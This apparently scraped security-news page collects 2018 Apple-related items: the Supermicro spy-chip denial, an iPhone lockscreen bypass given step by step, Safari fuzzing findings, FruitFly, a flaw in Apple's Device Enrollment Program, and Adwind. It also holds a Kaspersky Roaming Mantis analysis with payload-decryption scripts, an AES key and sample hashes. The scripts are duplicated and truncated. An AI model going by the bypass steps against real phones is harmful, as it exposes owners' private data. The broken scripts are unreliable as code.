- Apple -

Last update 09.10.2017 13:46:27

Introduction  List  Kategorie  Subcategory  0  1  2  3  4  5  6  7  8 

Apple Tells Congress Chinese Spy Chip Story Is False
10.10.2018 securityweek

The recent Bloomberg story claiming that Chinese spy chips made it into servers sold by California-based Super Micro is "simply wrong," Apple said in a letter sent on Monday to Congress.

The tech giant has denied claims that its servers were compromised and noted that its internal investigations have not found any evidence to support the Bloomberg report. The company also pointed out that some of the allegations from the article are based on a single anonymous source.

"While the story was being reported, we spoke with Bloomberg’s reporters and editors and answered any and all of their questions. We methodically dispelled the often-shifting nature of their claims. While we repeatedly asked them to share specific details about the alleged malicious chips that they seemed certain existed, they were unwilling or unable to provide anything more than vague secondhand accounts," wrote George Stathakopoulos, Apple's VP for information security.

"We were struck by the fact that the gravity and magnitude of the claims seemed to be undermined by their uncertainty around key details. Nevertheless, we worked tirelessly to ascertain whether these claims were true or, failing that, if anything even like them were true," he added.

Apple has denied finding any malicious chips or hardware manipulations, or contacting the FBI regarding such concerns, as claimed by Bloomberg.

The article describing the Chinese spy chips said the compromised devices were making outbound connections, and Apple is confident that its security systems would have detected this type of traffic.

According to Bloomberg, the Chinese government planted tiny chips in Supermicro motherboards in an effort to spy on more than 30 organizations, including government agencies and tech giants such as Apple and Amazon.

The report, based on information from 17 sources, claims that Chinese agents masquerading as government or Super Micro employees pressured or bribed managers at the Chinese factories where the motherboards are built. Once the chips were planted, they would allow attackers to remotely access the compromised devices.

Amazon and Super Micro have also strongly denied the claims, and their statements have been backed up by security agencies in the United States and the United Kingdom.

While some experts believe the attack described by Bloomberg is technically possible, others, including one of the people cited in the controversial article, have raised doubts.

Apple Patches Passcode Bypass in iOS
10.10.2018 securityweek

Apple on Monday released patches for iOS devices to address a recently disclosed vulnerability that could result in the bypass of the lockscreen.

The issue was found by iPhone enthusiast Jose Rodriguez, known for his YouTube channel “videosdebarraquito,” who revealed several other passcode bypass techniques in the past.

Exploitation requires both physical access to the device and for Siri to be enabled and Face ID to be disabled.

Once these conditions are met, an attacker can ask Siri to enable the VoiceOver accessibility feature that helps visually impaired individuals to use their Apple device by having the content of the screen and selected buttons read out to them.

The attacker can then call the locked device so that the “Messages” icon appears on the screen, to trigger a notification, and then bring up a white page with hidden buttons and functions. By abusing VoiceOver to cycle through the functions, the attacker can then access contacts and photos stored on the device.

The Cupertino-based tech giant has released iOS 12.0.1 to address the issue, which is actually the result of two vulnerabilities in the operating system.

Tracked as CVE-2018-4380, the first bug impacts VoiceOver. “A lock screen issue allowed access to photos and contacts on a locked device,” Apple notes in its advisory.

The second flaw, CVE-2018-4379, affects Quick Look: “A lock screen issue allowed access to the share function on a locked device,” Apple says.

Thus, the new platform update includes two patches, both available for iPhone 5s and later, iPad Air and later, and iPod touch 6th generation. To address the vulnerabilities, the patches restrict the options offered on a locked device.

Also on Monday, Apple released iCloud for Windows 7.7 to address 19 vulnerabilities in Webkit, including memory corruptions, arbitrary code execution, unexepected cross-origin behavior, script execution, and an ASSERT failure. The update is available for Windows 7 and later.

Google Criticizes Apple Over Safari Security, Flaw Disclosures
8.10.2018 securityweek

One Year After Release, Google Fuzzer Still Finds Many Flaws in Safari

One year after it was released as open source by Google Project Zero, the Domato fuzzer has still found a significant number of vulnerabilities in Apple's Safari web browser.

In September 2017, Google Project Zero researcher Ivan Fratric announced the release of a new Document Object Model (DOM) fuzzer designed for testing web browser engines. At the time, he revealed that Domato had helped him find more than 30 vulnerabilities, including two flaws in Chrome’s Blink engine, four in Firefox’s Gecko, four in Internet Explorer’s Trident, six in EdgeHtml, and 17 in Safari’s WebKit.

Since the highest number of security holes was found in WebKit, Fratric recently decided to once again test it to see if any improvements have been made by Apple.

The same type of testing – running 100 million iterations using computing power that could be purchased for roughly $1,000 – Fratric uncovered nine new vulnerabilities, including six in what at the time was the current version of Safari. The researcher also noticed that a majority of the bugs were in the WebKit code for more than six months before they were discovered.

"While 9 or 6 bugs (depending how you count) is significantly less than the 17 found a year ago, it is still a respectable number of bugs, especially if we take into an account that the fuzzer has been public for a long time now," Fratric said in a blog post.

In an effort to demonstrate the risk posed by the types of flaws identified using the Domato fuzzer, Fratric created an exploit for one of the use-after-free issues – these types of bugs can in many cases allow arbitrary code execution.

The expert reported his findings to Apple in June and July, and patches were released in September. However, Fratric has criticized the tech giant for not disclosing the existence of the vulnerabilities in the initial version of its advisories.

Specifically, Apple resolved the flaws with the release of iOS 12, tvOS 12 and Safari 12 on September 17, but did not mention them in its advisories. Instead, the company added information about the security bugs to its initial advisories only on September 24, when it also released updates and advisories for macOS Mojave 10.14.

"The original advisories most likely didn’t include all the issues because Apple wanted to wait for the issues to also be fixed on MacOS before adding them. However, this practice is misleading because customers interested in the Apple security advisories would most likely read them only once, when they are first released and the impression they would to get is that the product updates fix far less vulnerabilities and less severe vulnerabilities than is actually the case," Fratric said.

"Furthermore, the practice of not publishing fixes for mobile or desktop operating systems at the same time can put the desktop customers at unnecessary risk, because attackers could reverse-engineer the patches from the mobile updates and develop exploits against desktop products, while the desktop customers would have no way to update and protect themselves," he added.

Roaming Mantis part III: iOS crypto-mining and spreading via malicious content delivery system
5.10.2018 Kaspersky

In Q2 2018, Kaspersky Lab published two blogposts about Roaming Mantis sharing details of this new cybercriminal campaign. In the beginning, the criminals used DNS hijacking in vulnerable routers to spread malicious Android applications of Roaming Mantis (aka MoqHao and XLoader), spoofing legitimate applications such as Facebook and Chrome. During our research, it became clear that Roaming Mantis has been rather active and has evolved quickly. The group’s malware now supports 27 languages, including multiple countries from Asia and beyond, Europe and the Middle East. In addition, they have started using web crypto-mining for PC, and an Apple phishing page for iOS devices.

You can check previous chapters of this research here:

Roaming Mantis uses DNS hijacking to infect Android smartphones (April 2018)
Roaming Mantis dabbles in mining and phishing multilingually (May 2018)
In addition we would like to thank and credit security researchers from LAC Co. Ltd. for a very insightful article describing how vulnerable routers were compromised by the Roaming Mantis group, which was disclosed in their Japanese blogpost in June 2018. According to this research, the threat actor logged in to their router using default ID and password, and changed legitimate DNS settings to rogue DNS settings, where the router’s control panel was accessible over the Internet.

The Roaming Mantis group did not stop its activities after publication or our reports. We have confirmed several new activities and changes to their illegal profit-gaining methods such as web crypto mining for iOS devices, spreading via malicious content delivery system and so on. This blogpost reveals some details of our new findings related to Roaming Mantis, based on our research.

Web crypto-mining for iOS devices
The criminals previously targeted iOS devices using an Apple phishing site to steal credentials. However, they changed the HTML source code of the malicious landing page as follows:

Part of HTML source code of the malicious landing page for iOS

The code above shows that they disabled redirection to the fake Apple portal (with a phishing page) and added code with a web mining script (previously used only for the PC platform) to run mining on iOS devices.

If the user visits this landing page from an iOS device, a blank page displays in the web browser. In the background, CPU usage increases to 90% immediately.

Screen capture of the landing page and CPU monitoring tool

Interestingly, the day after we confirmed this, the attacker switched back to Apple phishing again. We believe that the criminals, at that time, were testing the possible revenue from web mining on iOS devices, looking for an efficient way to monetize their activities.

Filtering Japanese devices
One thing we noticed is that the criminals responded to a number of articles and research activities coming from Japan. The new feature was added in the landing page to filter out Japanese environment:

Added confirmation of Japanese environment for filtering

It looks like they want to slow down infections of Japanese targets for the time being.

Spreading via another malware delivery system
In the middle of July 2018, the live landing page we had been monitoring unfortunately went dark. However, the malicious APK files of Roaming Mantis, detected as “Trojan-Banker.AndroidOS.Wroba.al”, were still being detected by our customers, according to our KSN data.

Number of detected users from KSN data (Jun 10, 2018 – Sep 10, 2018)

Our deeper investigation revealed that their new malware spreading method was the one used by other Android malware, the “sagawa.apk” delivery system. We published a Japanese blogpost of this Android malware in January 2018. Trend Micro named it FAKESPY and published a blogpost about it, “FakeSpy Android Information-Stealing Malware Targets Japanese and Korean-Speaking Users”. According to our previous blogpost, the infection vector involved users received a phishing SMS message spoofing a notification from a Japanese delivery company. The message contained a malicious URL. If the user clicked it, the server displayed a fake web site that downloaded and installed the malicious application “sagawa.apk”. We discovered two types of such “sagawa.apk” samples:

Type A Type B
File name sagawa.apk sagawa.apk
md5 956f32a28d0057805c7234d6a13aa99b a19f4cb93274c949e66efe13173c95e6
File size 427KB (437,556) 2.3MB (2,381,665)
Loader module \classes.dex \classes.dex +
Encrypted payload (enc_data) \assets\a \assets\code.so
Decrypt algorithm payload = base64_dec(zlib_dec(enc_data)); aes_key = base64_dec(hardcoded data);
payload = AES_dec(enc_data, aes_key);
Alias MaqHao (McAfee)
XLoader (TrendMicro) FAKESPY (TrendMicro)
Old file name facebook.apk
${random}.apk sagawa.apk
Based on detailed static analysis, they belong to different Android malware families. Both Type A and Type B have common features, such as monitoring SMS messages and stealing data from infected devices. However, there are differences in their code structure, communication protocol and other features. One significant difference is that Type B targets Japan only, unlike Type A which is multilingual. Type B contains hardcoded strings that are displayed to infected users. These strings are in Japanese only.

Japanese messages displayed to infected users

In addition, this malware confirms whether a domestic Japanese prepaid card application is installed on the infected device.

Check for the domestic Japanese prepaid card application “Au Wallet”

If the application is installed on the device, the malware downloads and installs a fake application as its update.

Unfortunately, the relationship between the Roaming Mantis group and the service owner of the “sagawa.apk” delivery mechanism isn’t very clear at the moment. They might just use the same service as customers, or might not. However, it is clear that these criminal groups use the same malware-spreading eco-system for spreading their Android malware.

Researchers may use the following simplified python scripts to extract the payload from “sagawa.apk”:


#!/usr/bin/env python

import sys
import zlib
import base64

data = open(sys.argv[1],"rb").read()
dec_z = zlib.decompress(data)
dec_b = base64.b64decode(dec_z)

with open(sys.argv[1]+".dec","wb") as fp:
#!/usr/bin/env python

import sys
import zlib
import base64

data = open(sys.argv[1],"rb").read()
dec_z = zlib.decompress(data)
dec_b = base64.b64decode(dec_z)

with open(sys.argv[1]+".dec","wb") as fp:

#!/usr/bin/env python

import sys
from Crypto.Cipher import AES, ARC4
import base64

data = open(sys.argv[1],"rb").read()
key = sys.argv[2]
aes_key = base64.b64decode(key) // key is H8chGVmHxKRdjVSO14Mvgg== in libkao.so
aes = AES.new(aes_key)
dec = aes.decrypt(data)

with open(sys.argv[1]+".dec","wb") as fp:
#!/usr/bin/env python

import sys
from Crypto.Cipher import AES, ARC4
import base64

data = open(sys.argv[1],"rb").read()
key = sys.argv[2]
aes_key = base64.b64decode(key) // key is H8chGVmHxKRdjVSO14Mvgg== in libkao.so
aes = AES.new(aes_key)
dec = aes.decrypt(data)

with open(sys.argv[1]+".dec","wb") as fp:
Spreading via prezi.com like a scam
We also observed another malware distribution method of Roaming Mantis which is linked to prezi.com. Prezi is a popular computer application and online service to create dynamic presentations. The criminals used this service to spread their scam. When a user visits a page crafted by the attackers, a link is shown offering free content such as adult video, a game, a comic, music and so on, like pirate editions.

Redirection to a scam page

Based on our research, there were multiple messages leveraging different social engineering tricks to invite users to a scam website. On the other hand, the Roaming Mantis’ landing page was found to be linked to several such accounts carrying out redirections.

Corrupted landing page code from Roaming Mantis posted on prezi.com

However, fortunately this code does not work because of mistakes made during the code preparation stage.

Records of stolen data
Kaspersky Lab discovered fragments of data stolen from victims’ Android devices via Type A of the malware, which suggests thousands of compromised victims:

Suspected stolen data from victims’ Android devices

This data contained phone number, date, IP, language, email/id, password, name, date of birth, address, credit card information including cvv, bank information, and secret question and answer in Simplified Chinese. Data headers in Chinese suggest that the attackers are fluent in Chinese – unless this is a false flag, of course. The first column seems to contain the record number, which in July was already over 4,800. The user device language setting may indicate victims’ geography. Below is a pie chart created from the language data:

Victims’ language settings (download)

The top language is “en-us” (39%), the second is “ko-kr”, the third is “ru”. Judging from this data, victims’ geographical distribution has changed significantly since our first report. This might be due to the update adding support for 27 languages and the new distribution strategies. The reason why the “en-us” is the most popular could be because English is used as second language in several countries.

In previous reports, we claimed that the Roaming Mantis campaign had evolved significantly in a short period of time, applying new attack methods and expanding its targets. It seems that the attack doesn’t stop developing. In our recent research, we found that they probed using a web miner for iOS, instead of redirecting to a fake Apple website.

Another new method they applied is the use of a malware delivery eco-system that is probably operated by a third party and was used to spread other (maybe even unrelated) malware in the past. The infection vector in that case was an SMS message with a malicious link that led a user to a fake web site that offered a download of the malicious apk file “sagawa.apk”. It is not clear how Roaming Mantis and the distributor of “sagawa.apk” are related, but it’s worth mentioning the fact that they are now using the same eco-system.

Roaming Mantis is also trying to spread its malware via prezi.com, with a scam that offers a visitor free content such as videos and more.

Judging from the list of stolen credentials, the attackers seems to have stolen a large amount of data from victims worldwide. This gives us a glimpse of the real scale of the attack, but we believe that this is just a tip of the iceberg.

We strongly recommend that Android users turn off the option that allows installation of applications from third-party repositories, to keep their device safe. They should also be suspicious if their phones become unusually hot, which may be a side-effect of the hidden crypto-mining application in action.

Kaspersky Lab products detect this malware with the following verdict:

Malicious hosts:
Hashes of Type A:
956f32a28d0057805c7234d6a13aa99b sagawa.apk
3562f9de6dbe70c2e19a20d8683330ce \classes.dex
01fa0039b62c5db8d91dfc6b75b246f8 decrypted payload (dex file) from \assets\a
Hashes of Type B:
5e913208ecc69427efb6bbf9e6505624 \classes.dex
67bc2e8beb14b259a5c60fe7a31e6795 \arm64-v8a/libkao.so
f120f5f78c7ef762996314cf10f343af \armeabi-v7a/libkao.so
efe54c22e2b28a44f723d3479487620c \x86_64/libkao.so
e723c6aec4433f3c6e5d3d24fe810e05 \x86/libkao.so
daeccda295de93cf767fd39a86a44355 decrypted payload (jar file) from \assets\code.so
581b08b277a8504ed222a71c19cea5f9 classes.dex from decrypted payload

Apple Chief Says Firm Guards Data Privacy in China
4.10.2018 securityweek

Apple chief executive Tim Cook on Tuesday said the company is devoted to protecting people's privacy, with data encrypted and locked away on servers even in China.

Cook called privacy as one of the most important issues of this century, and maintained that the US-based technology colossus even safeguards data Chinese law requires it to keep stored in that country.

"We worked with a Chinese company to provide iCloud," Cook said, referring to Apple's service for storing digital content in the internet cloud during an interview with Vice News.

"But, the keys to the data are ours."

Cook said Apple hosts data on servers in an array of countries, but it is not easy for local authorities to get access. China is known for tight internet controls, prompting worries about the privacy of data stored there by Apple.

When asked about a recent security breach revealed by Facebook, Cook once again championed the importance of protecting people's information in a time when smartphones can reveal so much about them.

Cook has repeatedly stressed that Apple's business model does not involve gathering user data and targeting them with ads, the way internet giants Facebook and Google make money.

"You are not our product," Cook said.

"We don't create a profile and allow other companies to target you. That is not the business we are in."

Apple, valued at more than a trillion dollars based on its share price, makes most of its money from iPhone sales. The Silicon Valley company has been working to ramp up revenue from digital content and online services, such as streaming music and data storage.

Cook said that while he is a fan of the free market, he supports the idea of legislation aimed at protecting people's privacy.

"I think there is a need to work with Congress and the staff to make sure we do our jobs of helping them come up to speed on what's possible," Cook said.

"Technology itself doesn't want to be good. It doesn't want to be bad. It doesn't want to be anything. It is up to the creator."

Passcode Bypass Method Exposes Photos, Contacts on iPhone XS
2.10.2018 securityweek

An iPhone enthusiast has disclosed yet another method for bypassing the iPhone lockscreen. The latest technique has been confirmed to work on the new iPhone XS running the latest version of Apple’s mobile operating system, iOS 12.

Jose Rodriguez, known for his YouTube channel “videosdebarraquito,” found several passcode bypass techniques in the past and he has now identified another one.

As with all passcode bypass methods, physical access to the targeted device is required. Another prerequisite is that Siri needs to be enabled and Face ID has to be disabled for the hack to work.

The technique involves asking Siri to enable VoiceOver, an accessibility feature that allows users with visual impairments to use their Apple device by having the content of the screen and selected buttons read out to them.

The next step is to call the locked device so that the “Messages” icon appears on the screen. Once the messages menu is opened by selecting the “custom” option, a notification needs to be triggered on the targeted iPhone (e.g. by sending it a text, Facetime or Telegram message). When the notification is displayed, a double tap on the screen reveals a white page that contains hidden buttons and functions.

The VoiceOver feature allows the hacker to navigate through and use these buttons, including to access contacts and photos stored on the phone.

Apple likely intended to keep these buttons hidden while the iPhone was locked, but it appears that they are still visible and usable by the VoiceOver system.

While contact information is easier to obtain, the attacker has to blindly pick which photos from the gallery they want displayed.

The YouTube channel EverythingApplePro, which also published a video confirming the method, reported that the technique even works on iOS 12.1 beta.

SecurityWeek has reached out to Apple to find out if the company is aware of the new security bypass flaw and if it plans on releasing a patch. While in the past the tech giant managed to patch some lockscreen bypass vulnerabilities through server-side changes, the latest method may require an iOS update.

A second video posted by Rodriguez appears to show that the invisible menus can also be accessed by using Siri to create notes and activating the VoiceOver features. This method does not require calling or messaging the targeted phone.

Weak Passwords Abused for 'FruitFly' Mac Malware Distribution
2.10.2018 securityweek

FruitFly, a piece of Mac malware that infected thousands of machines over the course of more than 13 years, was being distributed via poorly protected external services.

First detailed in early 2017, FruitFly (also known as Quimitchin) targeted individuals, companies, schools, a police department, and the U.S. government, including a computer owned by a subsidiary of the Department of Energy.

In January this year, the U.S. Department of Justice indicted Phillip R. Durachinsky, an Ohio resident, for using the malware for more than 13 years for nefarious purposes. The man would abuse FruitFly to steal personal data of unknowing victims and spy on them, and even to produce child pornography.

Durachinsky allegedly leveraged the malware to control the infected machines “by accessing stored data, uploading files, taking and downloading screenshots, logging a user’s keystrokes, and turning on the camera and microphone to surreptitiously record images and audio,” the DoJ said in January.

While the threat’s capabilities were clear to the researchers who analyzed it, the only thing they couldn’t explain was the infection vector.

A newly discovered “flash alert” (PDF) that the Federal Bureau of Investigation (FBI) sent in March last year, however, solves the mystery: Durachinsky targeted poorly protected external services to install the malware onto his victims’ machines.

“The attack vector included the scanning and identification of externally facing Mac services to include the Apple Filing Protocol (AFP, port 548), RDP, VNC, SSH (port 22), and Back to My Mac (BTMM), which would be targeted with weak passwords or passwords derived from 3rd party data breaches,” the alert reads.

Discovered by Patrick Wardle, co-founder and chief research officer of enterprise macOS security company Digita Security, the document reveals that, in addition to using the malware to spy on victims, Durachinsky was leveraging the infection to target additional systems.

Basically, he scanned the Internet for Macs with exposed ports that he could exploit and then attempted to connect to these systems using weak, known credentials. Once a system was compromised, he then attempted to persistently install the malware.

The targeting of poorly protected remote access protocols for malware installation isn’t a new technique. In fact, there are millions of endpoints exposing ports associated with the Remote Desktop Protocol (RDP) and this type of attack even surpassed spam in popularity among ransomware operators.

Expert demonstrated how to access contacts and photos from a locked iPhone XS
1.10.2018 securityaffairs

Expert discovered a passcode bypass vulnerability in Apple’s new iOS version 12 that could be exploited to access photos, contacts on a locked iPhone XS .
The Apple enthusiast and “office clerk” Jose Rodriguez has discovered a passcode bypass vulnerability in Apple’s new iOS version 12 that could be exploited by an attacker (with physical access to the iPhone) to access photos, contacts on a locked iPhone XS and other devices.

The hack works on the latest iOS 12 beta and iOS 12 operating systems, as demonstrated by Rodriguez in a couple of videos he published on YouTube (Videosdebarraquito).

The passcode bypass vulnerability affects a number of other iPhone models including the latest model iPhone XS.

An attacker can access the images on the devices by editing a contact and changing the image associated with a specific caller.

Apple has addressed the issue allowing images to be viewed via contacts, but Rodriguez devised a new method to circumvent the mitigations implemented by Apple.

The attack exploits the VoiceOver feature that enables accessibility features on iPhone, for this reason, the vulnerable device needs to have Siri enabled and Face ID either turned off or physically covered.

A step by step guide for the Rodriguez’s attack was published by the website Gadget Hacks.

iPhone passcode bypass issues are not uncommon, in September 2015, Jose Rodriguez discovered that the iOS 9.0.1 Update failed to address a lock screen bypass vulnerability.

In November 2017, experts discovered a flaw in iOS 8 and newer versions of the Apple OS that allowed bypassing the iPhone Passcode protection, even when Touch ID was properly configured, and access photos and messages stored on the device.

Researchers Find 'Authentication Weakness' in Apple's Device Enrollment Program
28.9.2018 securityweek

Researchers from Duo Security have discovered a vulnerability (they call it an 'authentication weakness') in Apple's Device Enrollment Program (DEP). The flaw was reported to Apple in May 2018. It is not considered to be a major flaw, but could potentially have serious consequences. SecurityWeek has asked Apple if it has or plans to patch or fix the issue.

DEP is used to automatically enroll Apple devices into a company's mobile device management (MDM) server. The MDM is used to manage and configure user devices. DEP makes this enrollment process quick, simple and efficient -- and is a boon to any organization with a large number of mobile devices. "Users," comments Duo, "can unbox their new device and be ready to go on day one. If they purchase devices directly from Apple or an authorized reseller, they can have a zero-touch configuration of the endpoint as it is booted up for the first time."

The issue discovered by Duo resides in an undocumented private DEP API used by Apple devices to request their DEP profile. In order to retrieve the DEP profile -- which contains information about the organization that owns the device (email address, phone number. postal address and the MDM enrollment number) -- It only requires a valid serial number from the device as authentication -- the process assumes that the device sending the serial number is the device that owns the serial number.

"This is problematic," write the researchers in a report published today by Duo Labs, "because an attacker armed with only a valid, DEP-registered serial number can potentially enroll a rogue device into an organizationís MDM server, or use the DEP API to glean information from enrolled devices."

The serial numbers are predictable and constructed using a well-known schema. They were never meant to be secret -- just unique. It means that attackers do not have to find inadvertently leaked serial numbers but can instead generate valid serial numbers and use the DEP API to test if they are registered with DEP.

"The main problem here," James Barclay, senior R&D engineer at Duo Security, told SecurityWeek, "is that serial numbers were never meant to be secret. But it's not the end of the world. We don't see this as so much of a problem that people should stop using DEP. The benefits of having devices managed through Apple's MDM and using DEP to make enrollment a smooth process for end users, outweigh the risks."

This flaw doesn't lead directly to a breach situation, but still has its dangers. Those dangers, he continued, depend on how the organization has set up its MDM server. "If the MDM-provided configuration data includes a support desk help number, then the attacker could call support, identify himself with the serial number he already knows, and attempt to socially engineer a more useful position. Potentially more serious, if the MDM is set up to deliver wifi configuration including the wifi password, or perhaps the corporate VPN password, then this will fall into the hands of the attacker."

But there are remediation steps an organization can take regardless of whether Apple does anything. "Primarily," said Barclay, "organizations should implement a requirement for user authentication prior to enrollment with the MDM. If this is not possible, the MDM could simply install a single app at the beginning of the process. The app could require out-of-band user authentication prior to delivering any further configuration. This would minimize any possibility of an attacker enrolling a rogue device."

The problem at the moment is that in many cases customers don't require user authentication prior to MDM enrollment, and they're also deploying things like wifi passwords and VPN configuration data directly through MDM.

The problem might simply go away on future Apple devices. Newer devices include T1 or T2 cryptographic chips, and it would be possible to cryptographically identify individual devices within their Secure Enclave. "This could provide cryptographic assurance of the identity of a given device," write the researchers, "before enrolling it into an organization's MDM server via DEP."

Duo is not aware of any remedial steps being taken or planned by Apple. "We don't know and haven't been told whether Apple has any plans to solve the issue themselves," said Barclay. "We don't know of any direct fixes that have been put in place yet. It's possible that some of the mitigations could be implemented server-side without actually requiring a patch to the endpoint."

This is not the first DEP/MDM flaw to be disclosed. Jesse Endahl, CPO and CSO at macOS management firm Fleetsmith, and Max Belanger, staff engineer at Dropbox, showed at Black Hat in August 2018 that an MitM could intercept applications being sent from the MDM to the device.

Although SecurityWeek asked Apple for a comment on the latest issue, no response has been received at the time of writing. If we do get a statement, it will be appended to this article. Two days ago, Patrick Wardle (co-founder and chief research officer of enterprise macOS security company Digita Security) disclosed without details a vulnerability in the new Mojave iOS version allowing a malicious app to obtain data from the user's address book without having the necessary permissions.

Cloud-based identity and access management solutions provider Duo Security was acquired by Cisco for $2.35 billion in August 2018. In the previous October, Duo raised $70 million in Series D funding that valued the company at $1.17 billion at that time.

Pangu hackers are back, they realized the iOS 12 Jailbreak
28.9.2018 securityaffairs

The popular Chinese hacking team Pangu has devised the iOS 12 Jailbreak running on the latest iPhone XS. Users wait for further details.
Here we go again to speak about the notorious Chinese hacking team Pangu, the group is time popular for his ability to jailbreak Apple devices. This time the experts presented a jailbreak for iOS 12 running on the latest iPhone XS.

The last jailbreak for Apple iOS devised by the Pangu team was released in October 2015, when the expert published the untethered jailbreak tool for iOS 9.

iOS jailbreak allows to remove hardware restrictions implemented by the Apple’s operating system, Jailbreaking gives users root access to the iOS file system and manager, this allows them to download and install applications and themes from third-party stores.
Jailbreaking mobile devices expose them to a wild range of threats, including malware such as KeyRaider and YiSpector.
Below the Tweet shared by the researcher Min(Spark) Zheng on a Tweet that shows the successfully jailbreak on Apple iPhone XS with A12 Bionic chip announced by one of the Pangu researchers.

The experts pointed out that the iOS 12 jailbreak bypass a functional PAC (Pointer authentication codes) mitigation implemented in the new Apple’s A12 Bionic chip.

Min(Spark) Zheng
iOS 12 Jailbreak on iPhone XS by @PanguTeam ! Bypass PAC mitigation on the new A12 chip. That's amazing!!!👏👏👏

12:55 PM - Sep 27, 2018
1,037 people are talking about this
Twitter Ads info and privacy
Experts believe the same jailbreak should work also on iPhone XS Max because of the hardware similarities.

iOS 12 Jailbreak

The Pangu group still haven’t announced the jailbreak, but many users hope the team will release the iOS 12 jailbreak to the public.

macOS Mojave Patches Vulnerabilities, But New Flaws Already Emerge
25.9.2018 securityweek

Apple on Monday released the latest version of its macOS operating system. macOS Mojave 10.14 introduces some security enhancements and patches several vulnerabilities, but a new flaw has already emerged.

macOS Mojave addresses a total of 8 vulnerabilities affecting components such as Bluetooth, App Store, Application Firewall, Auto Unlock, Crash Reporter, Kernel and Security.

The Bluetooth vulnerability is CVE-2018-5383, which researchers at the Israel Institute of Technology disclosed in July. The flaw can allow an attacker in physical proximity of two targeted devices to monitor and manipulate the traffic they exchange. The issue was previously resolved by Apple in both iOS and macOS High Sierra.

In fact, many of the vulnerabilities mentioned in Apple’s advisory for Mojave security updates were previously patched in iOS.

The list of apparently new flaws patched in the latest macOS version includes an App Store bug that allows a malicious app to determine the Apple ID belonging to the targeted device’s owner (CVE-2018-4324) and an application firewall issue that can be exploited by a sandboxed process to bypass restrictions (CVE-2018-4353).

Interestingly, Apple says macOS Mojave removes support for the RC4 encryption algorithm due to the existence of CVE-2016-1777, an old vulnerability that the tech giant first patched in macOS Sierra back in 2016.

Just hours before Apple released Mojave, security researcher Patrick Wardle published a video apparently showing a potentially serious flaw that can be exploited to bypass some of the operating system’s privacy protections.

Wardle, who is the co-founder and chief research officer of enterprise macOS security company Digita Security, discovered that a malicious application can obtain data from a user’s address book despite not having the necessary permissions. The researcher has not made any technical details public to prevent abuse.

SecurityWeek has reached out to Apple to learn if it’s aware of the issue and will update this article if the company responds.

This is not the first time Wardle has disclosed a vulnerability that can lead to a security bypass and exposure of sensitive information. Last year he found a flaw that could have been exploited by malicious apps to steal passwords from the Keychain, and a method for bypassing the Secure Kernel Extension Loading (SKEL) security feature introduced in macOS High Sierra. The SKEL bypass was disclosed just days before the official release of High Sierra.

White hat hacker found a macOS Mojave privacy bypass 0-day flaw on release day
25.9.2018 securityaffairs

The popular macOS expert and former NSA hacker has discovered a zero-day vulnerability in macOS on Mojave ‘s release day.
It is always Patrick Wardle, this time the popular expert and former NSA hacker has found a zero-day flaw in macOS on Mojave ‘s release day.

According to the expert, the implementation bug can be exploited to access sensitive user data, including information in the address book.

The vulnerability resides in the implementation of the privacy-protection mechanisms for sensitive data.

The user data protection measures introduced in macOS Mojave force the users to provide the explicit consent for access sensitive data and files (i.e. location services, contacts, calendars, photos).

Applications can no longer do this automatically by simulating human input with synthetic clicks. Apple’s latest OS displays an authorization request for direct user interaction.

In order to improve the user experience, the OS allows the user to pre-authorize the apps they want to allow access to the sensitive data.
This is possible by adding them to the system’s Application Data category in the System Preferences, Security & Privacy panel.

Wardle was able to access the sensitive data using an unprivileged app.

“I found a trivial, albeit 100% reliable flaw in their implementation,” he told Bleeping computer.

Wardle explained that the exploitation of the zero-day issue only works on Mojave’s new privacy protection features.

patrick wardle

Mojave's 'dark mode' is gorgeous 🙌
...but its promises about improved privacy protections? kinda #FakeNews 😥

0day bypass:https://vimeo.com/291491984

btw if anybody has a link to 🍎's macOS bug bounty program I'd 💕 to report this & other 0days -donating any payouts to charity 🙏

3:45 PM - Sep 24, 2018
216 people are talking about this
Twitter Ads info and privacy
Below the video PoC published by Wardle, it shows the expert that tries to copy the content of the address book and denies the operation when the operating system asks for permission. Wardle then uses an unprivileged app that allows him to access the address book data.

Wardle plans to present technical details of the zero-day flaw in the upcoming Mac Security conference in Maui, Hawaii, in November.

New Adwind Campaign Targets Linux, Windows, and macOS

25.9.2018 securityweek  Apple

Adwind remote access Trojan (RAT) samples detected in a recently campaign were configured to gain persistence on Linux, Windows, and macOS systems, Cisco Talos warns.

The attacks featured the Adwind 3.0 RAT and employed a variant of the Dynamic Data Exchange (DDE) code injection attack on Microsoft Excel, ReversingLabs and Cisco Talos security researchers discovered.

The campaign started on August 26 and mainly targeted users in Turkey, with 75% of the observed requests made from that country. Some of the victims were located in Germany, likely members of the Turkish community there. The spam emails carrying malicious documents were written in Turkish.

The attackers used at least two different droppers for their malicious payload, in the form of CSV and XLT files. Both of them, however, would leverage a new variant of the DDE code injection attack, one that remained undetected until now.

In a report published Monday, Talos’ researchers explain that the dropper can actually have one of over 30 file extensions. While not all of them would be opened in Microsoft Excel by default, there are scripts that would start Excel with non-default files as well, making them viable in this attack scenario.

“Because the beginning of the file can contains anything, there is no header to be checked, which might confuse the antivirus additionally engines could expect ASCII characters for the CSV format. Other formats may be considered corrupted has they might not follow the expected format,” Talos reveals.

Excel also displays warnings to the user regarding the execution of code. One warning informs that the file, which is not a real XLT document, might be corrupted, asking the user if they are sure they want to open it. Two other warnings tell the user that the document will execute system applications.

If the user accepts all three warnings, the calculator application is executed on the system. The purpose of the campaign, however, is to inject code that would create and execute a Visual Basic Script that uses bitasdmin, a Microsoft tool to download or upload jobs and monitor their progress, to fetch the final payload.

The payload is a Java archive file containing code packed with the demo version of Allatori Obfuscator version 4.7.

The packed malware is a version of the Adwind RAT v3.0, configured to achieve persistence on all three major desktop platforms: Windows, Linux, and macOS. The persistence mechanism, however, is different for each platform.

Employed by several malicious groups for their nefarious purposes, the Trojan provides operators with the ability to execute all kind of commands on the victim machines, to log keystrokes, take screenshots, take pictures, and transfer files.

“The DDE variant used by the droppers in this campaign is a good example on how signature based antivirus can be tricked. It is also a warning sign regarding the file extension scanning configurations. This kind of injection is known for years, however this actor found a way to modify it in order to have an extremely low detection ratio,” Talos concludes.

Experts uncovered a new Adwind campaign aimed at Linux, Windows, and macOS systems

25.9.2018 securityaffairs Apple

Researchers from ReversingLabs and Cisco Talos have uncovered a new Adwind campaign that targets Linux, Windows, and macOS systems.
Security experts from ReversingLabs and Cisco Talos have spotted a new Adwind campaign that targets Linux, Windows, and macOS systems.

Adwind is a remote access Trojan (RAT), the samples used in the recently discovered campaign are Adwind 3.0 RAT and leverage the Dynamic Data Exchange (DDE) code injection attack on Microsoft Excel.

